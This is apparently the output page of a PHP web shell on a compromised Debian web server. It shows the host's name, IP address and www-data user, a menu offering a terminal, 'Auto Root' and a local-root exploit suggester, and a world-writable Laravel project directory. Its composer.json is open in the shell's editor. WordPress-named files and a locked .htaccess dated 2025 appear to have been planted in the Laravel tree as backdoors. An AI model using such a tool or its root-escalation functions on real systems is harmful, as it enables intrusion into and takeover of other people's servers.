Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.173
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
.scripts
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
app
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
bootstrap
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
config
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
database
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
node_modules
[ DIR ]
drwxr-xr-x
2022-04-21 14:27
public
[ DIR ]
drwxrwxrwx
2022-04-21 13:49
resources
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
routes
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
storage
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
tests
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
vendor
[ DIR ]
drwxrwxrwx
2022-04-21 14:24
.DS_Store
10
KB
-rwxrwxrwx
2022-04-21 13:43
.editorconfig
220
B
-rwxrwxrwx
2022-04-21 13:43
.env
1.02
KB
-rwxrwxrwx
2022-04-21 13:47
.env.example
751
B
-rwxrwxrwx
2022-04-21 13:43
.gitattributes
111
B
-rwxrwxrwx
2022-04-21 13:43
.gitignore
198
B
-rwxrwxrwx
2022-04-21 13:43
.htaccess
197
B
-r--r--r--
2025-10-25 04:45
.styleci.yml
174
B
-rwxrwxrwx
2022-04-21 13:43
artisan
1.65
KB
-rwxrwxrwx
2022-04-21 13:43
composer.json
2.11
KB
-rwxrwxrwx
2022-04-21 17:40
package.json
1.59
KB
-rwxrwxrwx
2022-04-21 13:43
phpstan.neon
154
B
-rwxrwxrwx
2022-04-21 13:43
phpunit.xml
1.11
KB
-rwxrwxrwx
2022-04-21 13:43
readme.md
535
B
-rwxrwxrwx
2022-04-21 13:43
server.php
563
B
-rwxrwxrwx
2022-04-21 13:43
webpack.mix.js
549
B
-rwxrwxrwx
2022-04-21 13:43
wp-blog-header.php
2.73
KB
-r--r--r--
2025-10-25 04:45
wp-cron.php
2.73
KB
-rw-r--r--
2025-10-25 04:45
Save
Rename
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": [ "framework", "laravel" ], "license": "MIT", "require": { "php": ">=7.0", "ext-json": "*", "cloudcreativity/laravel-json-api": "^3.2.0", "darkaonline/ripcord": "^0.1.8", "fideloper/proxy": "^4.0", "fruitcake/laravel-cors": "^2.0", "guzzlehttp/guzzle": "^7.4", "laravel-frontend-presets/material-dashboard": "^1.1", "laravel/framework": "^8.0", "laravel/legacy-factories": "^1.1", "laravel/passport": "^10.1.0", "laravel/telescope": "^4.0", "laravel/tinker": "^2.0", "laravel/ui": "^3.4", "lcobucci/jwt": "^3.4.0", "phpoffice/phpword": "^0.18.3" }, "require-dev": { "cloudcreativity/json-api-testing": "^3.1", "facade/ignition": "^2.3.6", "fzaninotto/faker": "^1.9.1", "mockery/mockery": "^1.0", "nunomaduro/collision": "^5.0", "nunomaduro/larastan": "^0.6.12", "phpunit/phpunit": "^9.0" }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true }, "extra": { "laravel": { "dont-discover": [] } }, "platform": { "php": "7.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "minimum-stability": "dev", "prefer-stable": true, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] } }